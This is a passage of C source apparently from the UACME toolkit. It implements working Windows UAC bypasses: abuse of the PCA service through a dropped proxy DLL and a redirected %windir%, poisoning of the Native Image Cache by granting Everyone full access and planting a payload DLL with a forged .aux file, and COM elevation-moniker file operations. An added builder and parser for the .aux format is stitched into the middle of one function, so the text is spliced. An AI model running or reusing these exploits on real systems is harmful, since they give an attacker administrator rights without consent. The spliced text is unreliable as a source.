    WCHAR szBuffer[MAX_PATH * 2], szEnvVar[MAX_PATH * 2];
    WCHAR szLoader[MAX_PATH * 2];
    WCHAR szLoaderName[64];
    WCHAR szLoaderCmdLine[2];
    WCHAR szObjectName[MAX_PATH];

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    RtlSecureZeroMemory(&szLoader, sizeof(szLoader));
    RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));

    do {

        if (!ucmxRunService(T_PCASVC))
            break;

        if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {
            fUsePca = FALSE;
        }

        RtlSecureZeroMemory(&szLoaderName, sizeof(szLoaderName));

        seedValue = ~GetTickCount();
        liValue.LowPart = RtlRandomEx(&seedValue);
        seedValue = GetTickCount();
        liValue.HighPart = RtlRandomEx(&seedValue);

        supBinTextEncode(liValue.QuadPart, szLoaderName);
        _strcat(szLoaderName, TEXT(".exe"));

        //
        // Create shared loader section.
        //
        RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));
        _strcpy(szObjectName, TEXT("\\Sessions\\"));
        ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));
        _strcat(szObjectName, TEXT("\\BaseNamedObjects\\"));
        supGenerateSharedObjectName((WORD)FUBUKI_PCA_SECTION_ID, _strend(szObjectName));

        liValue.QuadPart = PAGE_SIZE;

        RtlInitUnicodeString(&usObjectName, szObjectName);
        InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);

        ntStatus = NtCreateSection(&hSharedSection,
            SECTION_ALL_ACCESS,
            &obja,
            &liValue,
            PAGE_READWRITE,
            SEC_COMMIT,
            NULL);

        if (!NT_SUCCESS(ntStatus) || (hSharedSection == NULL)) {
            break;
        }

        ntStatus = NtMapViewOfSection(
            hSharedSection,
            NtCurrentProcess(),
            &pvLoaderBlock,
            0,
            PAGE_SIZE,
            NULL,
            &viewSize,
            ViewUnmap,
            MEM_TOP_DOWN,
            PAGE_READWRITE);

        if (!NT_SUCCESS(ntStatus) || (pvLoaderBlock == NULL)) {
            break;
        }

        //
        // Create completion event.
        //
        _strcpy(szObjectName, TEXT("\\BaseNamedObjects\\"));
        supGenerateSharedObjectName((WORD)FUBUKI_PCA_EVENT_ID, _strend(szObjectName));

        RtlInitUnicodeString(&usObjectName, szObjectName);
        InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);

        ntStatus = NtCreateEvent(&hSharedEvent,
            EVENT_ALL_ACCESS,
            &obja,
            SynchronizationEvent,
            FALSE);

        if (!NT_SUCCESS(ntStatus) || (hSharedEvent == NULL)) {
            break;
        }

        //
        // Stop WDI\ResolutionHost task.
        //
        if (!supStopTaskByName(
            TEXT("Microsoft\\Windows\\WDI"),
            TEXT("ResolutionHost")))
        {
            break;
        }

        supEnumProcessesForSession(NtCurrentPeb()->SessionId,
            (pfnEnumProcessCallback)supEnumTaskhostTasksCallback,
            (PVOID)&uStrTaskhost);

        //
        // Create destination dir "system32"
        //
        _strcpy(szBuffer, g_ctx->szCurrentDirectory);
        _strcat(szBuffer, SYSTEM32_DIR_NAME);
        cchDirName = _strlen(szBuffer);

        if (!CreateDirectory(szBuffer, NULL)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS) {
                break;
            }
        }

        fDirCreated = TRUE;

        //
        // Convert payload for dll hijack.
        //
        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            FUBUKI_ENTRYPOINT_PCADLL,
            FALSE))
        {
            break;
        }

        //
        // Drop payload to the fake system32 dir as PCADM.DLL.
        //
        szBuffer[cchDirName] = 0;
        _strcat(szBuffer, TEXT("\\"));
        _strcat(szBuffer, PCADM_DLL);

        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize)) {
            break;
        }

        //
        // Convert dll to exe to be loader task.
        //
        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            FUBUKI_ENTRYPOINT_PCAEXE,
            TRUE))
        {
            break;
        }

        //
        // Drop loader to the temp dir.
        //
        _strcpy(szLoader, g_ctx->szCurrentDirectory);
        _strcat(szLoader, szLoaderName);

        fLoaderCreated = supWriteBufferToFile(szLoader, ProxyDll, ProxyDllSize);
        if (!fLoaderCreated) {
            break;
        }

        //
        // Remember loader name
        //
        _strcpy(pvLoaderBlock->szLoader, szLoader);

        //
        // Set new %windir% environment variable.
        //
        _strcpy(szEnvVar, g_ctx->szCurrentDirectory);
        nLen = _strlen(szEnvVar);
        if (szEnvVar[nLen - 1] == L'\\') {
            szEnvVar[nLen - 1] = 0;
        }

        fEnvSet = supSetEnvVariable2(FALSE, NULL, T_WINDIR, szEnvVar);
        if (fEnvSet == FALSE) {
            break;
        }

        //
        // Set loader command line.
        //
        szLoaderCmdLine[0] = (fUsePca) ? TEXT('1') : TEXT('3');
        szLoaderCmdLine[1] = 0;

        //
        // Run loader suspended with parent set to shell process.
        //
        if (fUsePca) {

            hShellProcess = supOpenShellProcess(PROCESS_CREATE_PROCESS);
            if (hShellProcess == NULL) {
                break;
            }

            processInfo.hProcess = supRunProcessFromParent(hShellProcess,
                szLoader,
                szLoaderCmdLine,
                NULL,
                CREATE_SUSPENDED | CREATE_NO_WINDOW,
                0,
                &processInfo.hThread);

        }
        else {

            startupInfo.cb = sizeof(startupInfo);

            if (!CreateProcess(
                szLoader,
                szLoaderCmdLine,
                NULL,
                NULL,
                FALSE,
                CREATE_SUSPENDED | CREATE_NO_WINDOW,
                NULL,
                NULL,
                &startupInfo,
                &processInfo))
            {
                break;
            }

        }

        if (processInfo.hProcess == NULL) {
            break;
        }

        rpcStatus = supCreateBindingHandle(PCASVC_RPC, &rpcHandle);
        if (rpcStatus == RPC_S_OK) {

            if (fUsePca) {

                __try {
                    rpcStatus = RAiMonitorProcess(
                        rpcHandle,
                        (ULONG_PTR)processInfo.hProcess,
                        0,
                        szLoader,
                        szLoaderCmdLine,
                        g_ctx->szCurrentDirectory,
                        PCA_MONITOR_PROCESS_NORMAL);
                }
                __except (EXCEPTION_EXECUTE_HANDLER) {
                    rpcStatus = GetExceptionCode();
                }

            }
            else {

                __try {
                    rpcStatus = RAiNotifyUserCallbackExceptionProcess(
                        rpcHandle,
                        szLoader,
                        1,
                        processInfo.dwProcessId);
                }
                __except (EXCEPTION_EXECUTE_HANDLER) {
                    rpcStatus = GetExceptionCode();
                }

            }

            RpcBindingFree(&rpcHandle);
        }

        if (rpcStatus != RPC_S_OK)
            break;

        ResumeThread(processInfo.hThread);
        WaitForSingleObject(processInfo.hProcess, INFINITE);

        if (fUsePca) {
            GetExitCodeProcess(processInfo.hProcess, &ulResult);
            if (ulResult != 0)
                break;
        }

        WaitForSingleObject(hSharedEvent, 20 * 1000);

        MethodResult = (pvLoaderBlock->OpResult == FUBUKI_PCA_ALL_RUN) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;

    } while (FALSE);

    Sleep(2000);

    //
    // Cleanup.
    //
    if (processInfo.hThread)
        CloseHandle(processInfo.hThread);

    if (processInfo.hProcess) {
        TerminateProcess(processInfo.hProcess, ERROR_SUCCESS);
        CloseHandle(processInfo.hProcess);
    }

    if (hShellProcess)
        CloseHandle(hShellProcess); // handle from supOpenShellProcess, otherwise leaked

    if (hSharedEvent)
        NtClose(hSharedEvent);

    if (pvLoaderBlock)
        NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pvLoaderBlock);

    if (hSharedSection)
        NtClose(hSharedSection);

    if (fEnvSet)
        supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);

    if (fUsePca) {
        ucmxRemoveLoaderEntryFromRegistry(
            HKEY_CURRENT_USER,
            T_PCA_STORE,
            szLoaderName);
    }
    else {
        ucmxRemoveLoaderEntryFromRegistry(
            HKEY_LOCAL_MACHINE,
            T_APPCOMPAT_LAYERS,
            szLoaderName);

        ucmxRemoveLoaderEntryFromRegistry(
            HKEY_CURRENT_USER,
            T_PCA_PERSISTED,
            szLoaderName);
    }

    if (fLoaderCreated) {
        DeleteFile(szLoader);
    }

    if (fDirCreated) {
        DeleteFile(szBuffer);
        szBuffer[cchDirName] = 0;
        RemoveDirectory(szBuffer);
    }

    if (SUCCEEDED(hr_init))
        CoUninitialize();

    if (MethodResult != STATUS_SUCCESS)
        supSetGlobalCompletionEvent();

    return MethodResult;
}

NTSTATUS ucmxGenerateAUX(
    _In_ LPCWSTR AssemblyName,
    _Out_ PVOID* AuxData,
    _Out_ PSIZE_T AuxDataSize,
    _Out_opt_ GUID* ModuleGuid
)
{
    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
    LPWSTR lpAssemblyFilePath = NULL;
    HRESULT hr;
    IAssemblyCache* asmCache = NULL;
    IAssemblyEnum* asmEnum = NULL;
    IAssemblyName* asmName = NULL;
    GUID mvid;
    LPWSTR lpAssemblyName = NULL, lpDisplayName = NULL;
    LPSTR lpDisplayNameANSI = NULL;
    BOOL bFound = FALSE;
    SIZE_T auxSize = 0;
    PBYTE auxPtr = NULL, pbPad;
    PULONG dataPtr;
    SIZE_T cchName = 0, cchDisplayName = 0, padBytes, i;

    *AuxData = NULL;
    *AuxDataSize = 0;

    if (!fusUtilInitFusion((g_ctx->dwBuildNumber < NT_WIN8_RTM) ? 2 : 4))
        return ntStatus;

    RtlSecureZeroMemory(&mvid, sizeof(mvid));

    do {

        hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum,
            NULL,
            NULL,
            ASM_CACHE_GAC,
            NULL);

        if ((FAILED(hr)) || (asmEnum == NULL))
            break;

        hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);
        if ((FAILED(hr)) || (asmCache == NULL))
            break;

        //
        // Locate assembly and remember its name/display name.
// while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) { if (SUCCEEDED(fusUtilGetAssemblyName(asmName, &lpAssemblyName, &cchName, &lpDisplayName, &cchDisplayName))) { if (_strcmpi(AssemblyName, lpAssemblyName) == 0) { bFound = TRUE; break; } else { supHeapFree(lpAssemblyName); supHeapFree(lpDisplayName); lpAssemblyName = NULL; lpDisplayName = NULL; } } asmName->lpVtbl->Finalize(asmName); asmName->lpVtbl->Release(asmName); asmName = NULL; } if (FAILED(hr) || bFound == FALSE) { if (asmName) { asmName->lpVtbl->Finalize(asmName); asmName->lpVtbl->Release(asmName); asmName = NULL; } break; } lpDisplayNameANSI = (LPSTR)supHeapAlloc((1 + cchDisplayName) * sizeof(CHAR)); if (lpDisplayNameANSI == NULL) break; WideCharToMultiByte(CP_ACP, 0, lpDisplayName, (INT)cchDisplayName, lpDisplayNameANSI, (INT)(1 + cchDisplayName), NULL, NULL); // // Query assembly filepath. // hr = fusUtilGetAssemblyPath(asmCache, AssemblyName, &lpAssemblyFilePath); if (FAILED(hr)) break; // // Remember MVID. // if (!fusUtilGetImageMVID(lpAssemblyFilePath, &mvid)) break; // // Allocate buffer for AUX data. // auxSize = ALIGN_UP_TYPE(100 + (SIZE_T)cchDisplayName, sizeof(ULONG)); auxPtr = (PBYTE)supHeapAlloc(auxSize); if (auxPtr == NULL) break; dataPtr = (PULONG)auxPtr; // // Magic values go brrr. 
        //
        *dataPtr++ = 0x5;
        *dataPtr++ = (ULONG)auxSize - 8;
        *dataPtr++ = 0xB;
        *dataPtr++ = (ULONG)auxSize - 16;
        *dataPtr++ = 0xD;
        *dataPtr++ = (ULONG)auxSize - 100;

        RtlCopyMemory(dataPtr, lpDisplayNameANSI, cchDisplayName);

        padBytes = (auxSize - 100) - cchDisplayName;
        pbPad = (PBYTE)RtlOffsetToPointer(dataPtr, cchDisplayName);
        for (i = 0; i < padBytes; i++)
            *pbPad++ = 0xCC;

        dataPtr = (PULONG)RtlOffsetToPointer(dataPtr, cchDisplayName + padBytes);

        *dataPtr++ = 0x7;
        *dataPtr++ = 0x4;
        *dataPtr++ = 0x1109;
        *dataPtr++ = 0x2;
        *dataPtr++ = 0x8;
        *dataPtr++ = 0;
        *dataPtr++ = 0;
        *dataPtr++ = 0xF;
        *dataPtr++ = 0x4;
        *dataPtr++ = 0;
        *dataPtr++ = 0x10;
        *dataPtr++ = 0x4;
        *dataPtr++ = 0x1;
        *dataPtr++ = 0x9;
        *dataPtr++ = 0x10;

        RtlCopyMemory(dataPtr, &mvid, sizeof(mvid));

        *AuxData = auxPtr;
        *AuxDataSize = auxSize;
        if (ModuleGuid)
            *ModuleGuid = mvid;

        ntStatus = STATUS_SUCCESS;

    } while (FALSE);

    if (lpAssemblyFilePath) supHeapFree(lpAssemblyFilePath);
    if (lpAssemblyName) supHeapFree(lpAssemblyName);
    if (lpDisplayName) supHeapFree(lpDisplayName);
    if (lpDisplayNameANSI) supHeapFree(lpDisplayNameANSI);

    if (asmName) {
        asmName->lpVtbl->Finalize(asmName);
        asmName->lpVtbl->Release(asmName);
    }
    if (asmCache) asmCache->lpVtbl->Release(asmCache);
    if (asmEnum) asmEnum->lpVtbl->Release(asmEnum);

    if (!NT_SUCCESS(ntStatus) && auxPtr)
        supHeapFree(auxPtr);

    return ntStatus;
}

/*
* ucmNICPoisonMethod2
*
* Purpose:
*
* Bypass UAC by Dll hijack of Native Image Cache.
*
*/
NTSTATUS ucmNICPoisonMethod2(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;
    WCHAR szFileName[MAX_PATH * 2];
    WCHAR szTargetDir[MAX_PATH * 2];
    WCHAR szCacheDir[MAX_PATH * 2];
    WCHAR szMVID[64];
    LPWSTR oldSecurity = NULL;
    SIZE_T dirLen;
    GUID targetMVID;
    PVOID auxData = NULL;
    SIZE_T auxDataSize;
    BOOL bNeedSecurityReset = FALSE, bNeedRestore = FALSE;
    BOOL IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);

    do {
        //
        // Build cache path.
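The layout ucmxGenerateAUX emits, as an added example that is not part of UACME: a portable builder plus a checker that validates every field (three tag/length pairs, the ANSI display name padded with 0xCC to a 4-byte boundary, the fixed 15-ULONG trailer, then the 16-byte MVID). The tag values are copied from the function above, but their meaning is not documented on the page, so the checker treats them as opaque constants; the MVID and the assembly display names used in the self-test are constructed samples.

```c
/* Added example, not UACME code: build/check the MMCEx.ni.aux byte layout
   written by ucmxGenerateAUX. Tag meanings are treated as opaque. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define AUX_FIXED_BYTES 100u   /* header (24) + trailer (60) + MVID (16) */
#define AUX_PAD_BYTE    0xCCu  /* fill between display name and trailer */

/* 15 ULONGs written after the padded display name, before the MVID. */
static const uint32_t aux_trailer[15] = {
    0x7, 0x4, 0x1109, 0x2, 0x8, 0, 0, 0xF, 0x4, 0, 0x10, 0x4, 0x1, 0x9, 0x10
};

static void put32(unsigned char *at, uint32_t v)          /* little-endian */
{
    at[0] = (unsigned char)v;         at[1] = (unsigned char)(v >> 8);
    at[2] = (unsigned char)(v >> 16); at[3] = (unsigned char)(v >> 24);
}

static uint32_t get32(const unsigned char *at)
{
    return (uint32_t)at[0] | ((uint32_t)at[1] << 8) |
           ((uint32_t)at[2] << 16) | ((uint32_t)at[3] << 24);
}

/* Same rounding as ALIGN_UP_TYPE(100 + cchDisplayName, sizeof(ULONG)). */
size_t aux_size_for(size_t name_len)
{
    return (AUX_FIXED_BYTES + name_len + 3u) & ~(size_t)3u;
}

/* Returns a malloc'd blob (caller frees) of aux_size_for(strlen(name)) bytes. */
unsigned char *aux_build(const char *name, const unsigned char mvid[16], size_t *out_size)
{
    size_t name_len = strlen(name), size = aux_size_for(name_len);
    size_t pad = (size - AUX_FIXED_BYTES) - name_len;   /* 0..3 bytes of 0xCC */
    unsigned char *buf = malloc(size), *p = buf;
    size_t i;

    if (buf == NULL) return NULL;
    put32(p, 0x5);      put32(p + 4,  (uint32_t)(size - 8));
    put32(p + 8, 0xB);  put32(p + 12, (uint32_t)(size - 16));
    put32(p + 16, 0xD); put32(p + 20, (uint32_t)(size - AUX_FIXED_BYTES));
    p += 24;
    memcpy(p, name, name_len);
    memset(p + name_len, AUX_PAD_BYTE, pad);
    p += name_len + pad;
    for (i = 0; i < 15; i++, p += 4) put32(p, aux_trailer[i]);
    memcpy(p, mvid, 16);
    *out_size = size;
    return buf;
}

/* Check a blob against the same layout and extract name and MVID.
   0 on success, a negative code naming the first bad field otherwise.
   Assumes the ANSI display name never ends in the 0xCC pad byte. */
int aux_parse(const unsigned char *buf, size_t size,
              char *name_out, size_t name_cap, unsigned char mvid_out[16])
{
    size_t region, name_len, i;
    const unsigned char *p;

    if (buf == NULL || size < AUX_FIXED_BYTES || (size & 3u)) return -1;
    if (get32(buf) != 0x5 || get32(buf + 4) != (uint32_t)(size - 8)) return -2;
    if (get32(buf + 8) != 0xB || get32(buf + 12) != (uint32_t)(size - 16)) return -3;
    if (get32(buf + 16) != 0xD ||
        get32(buf + 20) != (uint32_t)(size - AUX_FIXED_BYTES)) return -4;

    region = size - AUX_FIXED_BYTES;            /* display name + pad */
    p = buf + 24;
    name_len = region;
    while (name_len > 0 && p[name_len - 1] == AUX_PAD_BYTE) name_len--;
    if (region - name_len > 3) return -5;       /* more pad than alignment needs */
    if (name_len + 1 > name_cap) return -6;
    memcpy(name_out, p, name_len);
    name_out[name_len] = '\0';

    p += region;
    for (i = 0; i < 15; i++, p += 4)
        if (get32(p) != aux_trailer[i]) return -7;
    memcpy(mvid_out, p, 16);
    return 0;
}

/* Build, parse back, then corrupt the second tag; blob size on success, -1 otherwise. */
long aux_roundtrip(const char *name)
{
    static const unsigned char mvid[16] = {   /* constructed sample, not a real MVID */
        0xde, 0xad, 0xbe, 0xef, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c };
    unsigned char out_mvid[16], *blob;
    char out_name[256];
    size_t size = 0;
    long result = -1;

    blob = aux_build(name, mvid, &size);
    if (blob == NULL) return -1;
    if (aux_parse(blob, size, out_name, sizeof out_name, out_mvid) == 0 &&
        strcmp(out_name, name) == 0 && memcmp(out_mvid, mvid, 16) == 0) {
        blob[8] ^= 0xFF;                          /* second tag is no longer 0xB */
        if (aux_parse(blob, size, out_name, sizeof out_name, out_mvid) == -3)
            result = (long)size;
    }
    free(blob);
    return result;
}
```

aux_roundtrip builds a blob, parses it back and then flips a byte in the second tag to confirm the checker reports that field; the sizes it returns (104 for a 3-character name, 172 for a 72-character display name) follow directly from ALIGN_UP_TYPE(100 + cchDisplayName, 4).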
// _strcpy(szCacheDir, g_ctx->szSystemRoot); _strcat(szCacheDir, TEXT("assembly\\NativeImages_")); if (IsWin7) _strcat(szCacheDir, NET2_DIR); else _strcat(szCacheDir, NET4_DIR); #ifdef _WIN64 _strcat(szCacheDir, TEXT("_64")); #else _strcat(szCacheDir, TEXT("_32")); #endif ntStatus = ucmxGenerateAUX(ASSEMBLY_MMCEX, &auxData, &auxDataSize, NULL); if (!NT_SUCCESS(ntStatus)) { MethodResult = ntStatus; break; } RtlSecureZeroMemory(&szMVID, sizeof(szMVID)); RtlSecureZeroMemory(&targetMVID, sizeof(targetMVID)); if (!fusUtilGetAssemblyMVIDFromZapCache(ASSEMBLY_MMCEX, &targetMVID)) break; fusUtilBinToUnicodeHex((PBYTE)&targetMVID, sizeof(GUID), szMVID); // // Remember old directory security permissions. // if (!ucmMasqueradedGetObjectSecurityCOM(szCacheDir, DACL_SECURITY_INFORMATION, SE_FILE_OBJECT, &oldSecurity)) { break; } // // Reset target file permissions. // if (!ucmMasqueradedSetObjectSecurityCOM(szCacheDir, DACL_SECURITY_INFORMATION, SE_FILE_OBJECT, T_SDDL_EVERYONE_FULL_ACCESS)) { break; } bNeedSecurityReset = TRUE; // // Move MMCEx to MMCEx.$ // _strcpy(szFileName, szCacheDir); _strcat(szFileName, MMCEX_DIR); _strcpy(szTargetDir, szFileName); _strcat(szTargetDir, TEXT(".$")); if (!MoveFileEx(szFileName, szTargetDir, MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH)) { break; } bNeedRestore = TRUE; // // 1. MMCEx // 2. MMCEx\\ // 3. MMCEx\\MMCEx.ni.dll // 4. MMCEx\\MMCEx.ni.aux // // 1. MMCEx // if (!CreateDirectory(szFileName, NULL)) if (GetLastError() != ERROR_ALREADY_EXISTS) { break; } // // 2. Subdirectory // supPathAddBackSlash(szFileName); _strcat(szFileName, szMVID); if (!CreateDirectory(szFileName, NULL)) if (GetLastError() != ERROR_ALREADY_EXISTS) { break; } // // 3. Drop payload. // supPathAddBackSlash(szFileName); dirLen = _strlen(szFileName); _strcat(szFileName, MMCEX_NI_DLL); if (!supWriteBufferToFile(szFileName, ProxyDll, ProxyDllSize)) { break; } // // 4. Drop aux payload. 
// szFileName[dirLen] = 0; _strcat(szFileName, MMCEX_NI_DLL_AUX); if (!supWriteBufferToFile(szFileName, auxData, (ULONG)auxDataSize)) { break; } // // Run target. // _strcpy(szFileName, g_ctx->szSystemDirectory); _strcat(szFileName, MMC_EXE); if (supRunProcess2(szFileName, WF_MSC, NULL, SW_SHOW, SUPRUNPROCESS_TIMEOUT_DEFAULT)) { MethodResult = STATUS_SUCCESS; } } while (FALSE); if (bNeedRestore) { // // Remove fake directory. // _strcpy(szFileName, szCacheDir); _strcat(szFileName, MMCEX_DIR); supRemoveDirectoryRecursive(szFileName); // // Restore original MMCEx directory. // _strcat(szFileName, TEXT(".$")); _strcpy(szTargetDir, szCacheDir); _strcat(szTargetDir, MMCEX_DIR); MoveFileEx(szFileName, szTargetDir, MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); } // // Revert directory security. // if (oldSecurity) { if (bNeedSecurityReset) { ucmMasqueradedSetObjectSecurityCOM(szCacheDir, DACL_SECURITY_INFORMATION, SE_FILE_OBJECT, oldSecurity); } CoTaskMemFree(oldSecurity); } if (auxData) supHeapFree(auxData); if (!NT_SUCCESS(MethodResult)) supSetGlobalCompletionEvent(); return MethodResult; } /* * ucmAtlHijackMethod * * Purpose: * * Bypass UAC by abusing search order of WMI management console dependency dll. * */ NTSTATUS ucmAtlHijackMethod( _In_opt_ LPCWSTR lpTargetApp, _In_ LPCWSTR lpTargetDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { return ucmGenericAutoelevationEx(lpTargetApp, lpTargetDll, WMIMGMT_MSC, WBEM_DIR, ProxyDll, ProxyDllSize); } ================================================ FILE: Source/Akagi/methods/comsup.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2017 - 2021 * * TITLE: COMSUP.C * * VERSION: 3.57 * * DATE: 01 Nov 2021 * * COM interfaces based routines. 
* * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" /* * ucmAllocateElevatedObject * * Purpose: * * CoGetObject elevation as admin. * */ HRESULT ucmAllocateElevatedObject( _In_ LPCWSTR lpObjectCLSID, _In_ REFIID riid, _In_ DWORD dwClassContext, _Outptr_ void **ppv ) { DWORD classContext; HRESULT hr = E_FAIL; PVOID ElevatedObject = NULL; /* CLSID xCLSID; IUnknown *IBase; */ BIND_OPTS3 bop; WCHAR szMoniker[MAX_PATH]; do { if (_strlen(lpObjectCLSID) > 64) break; /* if (NOERROR == CLSIDFromString( lpObjectCLSID, &xCLSID)) { hr = CoCreateInstance( &xCLSID, NULL, CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, riid, &IBase); if (hr == S_OK) { IBase->lpVtbl->Release(IBase); } } */ RtlSecureZeroMemory(&bop, sizeof(bop)); bop.cbStruct = sizeof(bop); classContext = dwClassContext; if (dwClassContext == 0) classContext = CLSCTX_LOCAL_SERVER; bop.dwClassContext = classContext; _strcpy(szMoniker, T_ELEVATION_MONIKER_ADMIN); _strcat(szMoniker, lpObjectCLSID); hr = CoGetObject(szMoniker, (BIND_OPTS *)&bop, riid, &ElevatedObject); } while (FALSE); *ppv = ElevatedObject; return hr; } /* * ucmxFileOpCreateAndRelease * * Purpose: * * Test create new instance IFileOperation. * */ VOID ucmxFileOpCreateAndRelease(VOID) { IFileOperation *FileOperation = NULL; if (S_OK != CoCreateInstance( &CLSID_FileOperation, NULL, CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation)) { return; } if (FileOperation != NULL) { FileOperation->lpVtbl->Release(FileOperation); } } /* * ucmMasqueradedRenameElementCOM * * Purpose: * * Rename file/directory autoelevated. * This function expects that supMasqueradeProcess was called on process initialization. 
* */ BOOL ucmMasqueradedRenameElementCOM( _In_ LPCWSTR OldName, _In_ LPCWSTR NewName ) { BOOL bResult = FALSE; IFileOperation *FileOperation = NULL; IShellItem *psiDestDir = NULL; HRESULT hr_init; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { //ucmxFileOpCreateAndRelease(); if (S_OK != ucmAllocateElevatedObject( T_CLSID_FileOperation, &IID_IFileOperation, CLSCTX_LOCAL_SERVER, &FileOperation)) { break; } if (FileOperation == NULL) { break; } if (S_OK != FileOperation->lpVtbl->SetOperationFlags( FileOperation, g_ctx->IFileOperationFlags)) { break; } if (S_OK != SHCreateItemFromParsingName( OldName, NULL, &IID_IShellItem, &psiDestDir)) { break; } if (S_OK != FileOperation->lpVtbl->RenameItem( FileOperation, psiDestDir, NewName, NULL)) { break; } if (S_OK != FileOperation->lpVtbl->PerformOperations( FileOperation)) { break; } psiDestDir->lpVtbl->Release(psiDestDir); psiDestDir = NULL; bResult = TRUE; } while (FALSE); if (FileOperation != NULL) { FileOperation->lpVtbl->Release(FileOperation); } if (psiDestDir != NULL) { psiDestDir->lpVtbl->Release(psiDestDir); } if (hr_init == S_OK) CoUninitialize(); return bResult; } /* * ucmMasqueradedCreateSubDirectoryCOM * * Purpose: * * Create directory autoelevated. * This function expects that supMasqueradeProcess was called on process initialization. 
* */ BOOL ucmMasqueradedCreateSubDirectoryCOM( _In_ LPCWSTR ParentDirectory, _In_ LPCWSTR SubDirectory ) { BOOL bResult = FALSE; IFileOperation *FileOperation = NULL; IShellItem *psiDestDir = NULL; HRESULT hr_init; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { //ucmxFileOpCreateAndRelease(); if (S_OK != ucmAllocateElevatedObject( T_CLSID_FileOperation, &IID_IFileOperation, CLSCTX_LOCAL_SERVER, &FileOperation)) { break; } if (FileOperation == NULL) { break; } if (S_OK != FileOperation->lpVtbl->SetOperationFlags( FileOperation, g_ctx->IFileOperationFlags)) { break; } if (S_OK != SHCreateItemFromParsingName( ParentDirectory, NULL, &IID_IShellItem, &psiDestDir)) { break; } if (S_OK != FileOperation->lpVtbl->NewItem( FileOperation, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL)) { break; } if (S_OK != FileOperation->lpVtbl->PerformOperations( FileOperation)) { break; } psiDestDir->lpVtbl->Release(psiDestDir); psiDestDir = NULL; bResult = TRUE; } while (FALSE); if (FileOperation != NULL) { FileOperation->lpVtbl->Release(FileOperation); } if (psiDestDir != NULL) { psiDestDir->lpVtbl->Release(psiDestDir); } if (hr_init == S_OK) CoUninitialize(); return bResult; } /* * ucmMasqueradedMoveCopyFileCOM * * Purpose: * * Move or Copy file autoelevated. * This function expects that supMasqueradeProcess was called on process initialization. 
* */ BOOL ucmMasqueradedMoveCopyFileCOM( _In_ LPCWSTR SourceFileName, _In_ LPCWSTR DestinationDir, _In_ BOOL fMove ) { BOOL bResult = FALSE; IFileOperation *FileOperation = NULL; IShellItem *isrc = NULL, *idst = NULL; HRESULT r = E_FAIL, hr_init; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { //ucmxFileOpCreateAndRelease(); if (S_OK != ucmAllocateElevatedObject( T_CLSID_FileOperation, &IID_IFileOperation, CLSCTX_LOCAL_SERVER, &FileOperation)) { break; } if (FileOperation == NULL) { break; } if (S_OK != FileOperation->lpVtbl->SetOperationFlags( FileOperation, g_ctx->IFileOperationFlags)) { break; } if (S_OK != SHCreateItemFromParsingName( SourceFileName, NULL, &IID_IShellItem, &isrc)) { break; } if (S_OK != SHCreateItemFromParsingName( DestinationDir, NULL, &IID_IShellItem, &idst)) { break; } if (fMove) { r = FileOperation->lpVtbl->MoveItem( FileOperation, isrc, idst, NULL, NULL); } else { r = FileOperation->lpVtbl->CopyItem( FileOperation, isrc, idst, NULL, NULL); } if (r != S_OK) break; if (S_OK != FileOperation->lpVtbl->PerformOperations( FileOperation)) { break; } idst->lpVtbl->Release(idst); idst = NULL; isrc->lpVtbl->Release(isrc); isrc = NULL; bResult = TRUE; } while (FALSE); if (FileOperation != NULL) FileOperation->lpVtbl->Release(FileOperation); if (isrc != NULL) isrc->lpVtbl->Release(isrc); if (idst != NULL) idst->lpVtbl->Release(idst); if (hr_init == S_OK) CoUninitialize(); return bResult; } /* * ucmMasqueradedDeleteDirectoryFileCOM * * Purpose: * * Delete directory or file autoelevated. * This function expects that supMasqueradeProcess was called on process initialization. 
*
*/
BOOL ucmMasqueradedDeleteDirectoryFileCOM(
    _In_ LPCWSTR FileName
)
{
    BOOL bResult = FALSE;
    IFileOperation *FileOperation = NULL;
    IShellItem *isrc = NULL;
